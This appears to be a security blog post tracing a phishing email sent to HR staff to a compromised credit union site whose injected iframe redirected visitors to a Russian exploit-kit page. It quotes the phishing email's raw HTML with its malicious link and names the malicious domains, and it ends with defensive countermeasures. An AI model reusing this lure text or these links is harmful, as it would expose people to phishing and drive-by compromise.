Recently a client of mine alerted me to an email that was received by one of their HR staff members. The body of the email is shown below:

Despite having received security awareness training, the staff member clicked on the link thinking this was a document that needed to be reviewed. In actuality, it was a link to a malicious site. Fortunately, there were technical controls in place that prevented the user’s machine from being compromised, but I thought it would be illuminating to follow the trail of this attack.

Step 1

The email bypassed the client’s anti-spam and anti-malware defenses most likely because the link in the email was actually to a legitimate website rather than a known malicious site, the email came from a well known email provider, and there was little else in the message. Below is the actual html contained in the email. Notice the part in bold as this is the hyperlink used in the email.

<html><head></head><body’hmmessage’>After our legal department studied this contract carefully, they’ve notic=ed the following mismatches with our previous arrangements. We’ve compose=d a preliminary variant of the new contract, please study it and make sur=e that all the issues are matching your interests<br><a href=3D”http://mo=neymix.cuna.org/blog/wordpress/wsdno.htm?M0DJ854=3D318L77Y4SFO&3L6=3DG2DG=Z8C9F2O9DV2LFX&99G2R=3DI996N6O9B3WJQ8DVL&FV882F6=3D5CFM197E9&”>Contract.d=oc 72kb</a><br><br><br>With Best Wishes<br>Elvina Riggs<br><br><br>Secure Checksum: 9d08e1116b5<=br> </body></html>

Step 2

Once the user clicked on the link, they were taken to the site hxxp://moneymix.cuna.org. This is a legitimate site operated by the Credit Union National Association, a credit union trade association. Moneymix is a service offered by the association to other credit unions to provide social media content to the websites of credit unions that sign up for the service. Hackers had injected a malicious iframe on this website that would then redirect the user to hxxp://ciredret.ru/main.php.

Step 3

The main.php script contained javascript that attempted to exploit several potential vulnerabilities on the user’s machine. I was able to download the script and analyze it. By inserting an “alert” statement into the script just prior to the actual execution of the code, we can get a good idea of what the script does. Below is a sample of the output:

This exploit checks the installed versions of a number of applications including browsers, java, flash and Adobe reader. If it finds a vulnerable version, it attempts to exploit the vulnerability and compromise the machine. This code appears to be very widely used as I found numerous copies of it on sites such as Pastebin. A more readable version of the above code can be found here. Given that this script is being used on so many sites, it seems likely that it is part of one of the many commercial exploit packs that are available on the web.

Conclusion

Based on this research we can draw some conclusions about appropriate countermeasures to address this type of threat. First, user awareness is key. Users must be educated about these types of threats so that they can identify and avoid them. Second, defense in depth is a must. In this case the client had anti-spam and anti-malware technology on their mail gateway, but this threat still made it through. Additional countermeasures such as a web security gateway or proxy server are also recommended. The last line of defense would be on the endpoint itself. Third, it is important to understand that even legitimate websites can be victimized and used to spread malware. Don’t assume that because a site is well known or in a particular industry that it is safe. Lastly, keep your systems patched, including third party applications. Ninety-five percent of known exploits are useless against a fully patched system.

Note: I contacted the administrators of the Credit Union National Association website to advise them of the fact that their site was compromised. To their credit they removed the offending file very quickly.